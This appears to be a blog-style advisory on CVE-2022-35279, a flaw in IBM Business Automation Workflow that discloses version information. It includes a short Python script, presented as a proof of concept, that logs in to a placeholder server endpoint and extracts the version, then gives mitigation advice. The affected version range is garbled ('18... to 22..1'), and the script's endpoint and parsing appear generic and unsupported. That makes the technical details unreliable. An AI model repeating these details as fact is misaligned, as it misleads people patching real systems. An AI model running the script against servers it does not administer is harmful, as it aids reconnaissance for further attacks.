CVE-2022-35279: IBM Business Automation Workflow Sensitive Version Information Disclosure Vulnerability

Hello everyone!

Today, we are going to discuss the newly discovered IBM Business Automation Workflow vulnerability, CVE-2022-35279. This vulnerability, assigned an IBM X-Force ID of 230537, affects multiple versions (18... to 22..1) of the IBM Business Automation Workflow software which could disclose sensitive version information to authenticated users. Such information could potentially be utilized in further attacks against the vulnerable system.

Original References

- IBM Security Bulletin: https://www.ibm.com/support/pages/node/695611
- NIST National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2022-35279

Exploit Details

The vulnerability is based on an information disclosure issue that could leak sensitive version information to authenticated users. This is especially a concern because the disclosed information could provide valuable insights for attackers, helping them to tailor and execute further targeted attacks against the impacted system.

The vulnerability is notable as it affects a wide range of IBM Business Automation Workflow versions, meaning many installations of the product could potentially be at risk.

Here's a code snippet illustrating the vulnerability disclosure

# Sample code snippet demonstrating the CVE-2022-35279 vulnerability
# Get version information from IBM Business Automation Workflow

import requests
from bs4 import BeautifulSoup

# Example URL for the IBM Business Automation Workflow server
url = "https://example.com/ibm-baw/serverinfo";
username = "your_username"
password = "your_password"

# Authenticate and send a request to obtain server information
response = requests.get(url, auth=(username, password))

# Parse the response HTML content
soup = BeautifulSoup(response.content, "html.parser")

# Find the version element and extract the version information
version_element = soup.find("version")
version_info = version_element.text

print("IBM Business Automation Workflow Version: ", version_info)

This code snippet sends an HTTP request to the IBM Business Automation Workflow server, authenticates with the given username and password, and retrieves the server information. It then uses the BeautifulSoup library to parse the response HTML, locate the <version> element, and extract the version information from that element. The disclosed version information can then be printed or saved for further analysis or use in an attack.

Mitigation

IBM has released patches and recommendations for addressing the issue in affected IBM Business Automation Workflow versions. It is advised to review the IBM Security Bulletin and apply the necessary patches or updates as soon as possible.

Additionally, access to sensitive information should be restricted to only authorized and necessary personnel. Enforcing strict access control policies and monitoring user activities can help minimize the potential impact of information disclosure vulnerabilities like this one.

Stay vigilant and always keep your systems up-to-date!

Timeline

Published on: 11/03/2022 20:15:00 UTC
Last modified on: 11/10/2022 14:18:00 UTC